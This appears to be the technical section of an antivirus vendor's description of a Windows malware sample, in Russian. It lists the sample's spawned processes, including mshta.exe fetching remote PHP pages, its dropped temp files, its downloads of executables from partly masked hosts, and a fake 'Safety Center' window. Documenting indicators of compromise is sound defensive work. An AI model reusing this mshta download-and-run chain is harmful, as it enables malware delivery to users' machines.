Техническая информация
- <Текущая директория>\temp.exe (загружен из сети Интернет)
- <SYSTEM32>\cmd.exe /c ""<Текущая директория>\temp.bat" "
- <SYSTEM32>\wscript.exe "<Текущая директория>\temp.js"
- <SYSTEM32>\mshta.exe http://95.##1.27.154/install.php?id#################################
- <SYSTEM32>\mshta.exe http://ur###nam.net/8732489273.php
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\0D6B6PI5\8732489273[1].php
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\ULU3YH2D\u4[1].exe
- <Текущая директория>\temp.exe
- <Текущая директория>\temp.js
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\69I9OPW5\install[1].php
- <Текущая директория>\temp
- <Текущая директория>\temp.bat
- <Текущая директория>\temp
- 'ur###nam.net':80
- 'localhost':1040
- '22#.#3.218.83':80
- 'localhost':1035
- '95.##1.27.154':80
- 'localhost':1037
- 22#.#3.218.83/u4.exe
- ur###nam.net/8732489273.php
- 95.##1.27.154/install.php?id#################################
- DNS ASK ur###nam.net
- ClassName: 'TForm1' WindowName: 'Safety Center'
- ClassName: 'Shell_TrayWnd' WindowName: ''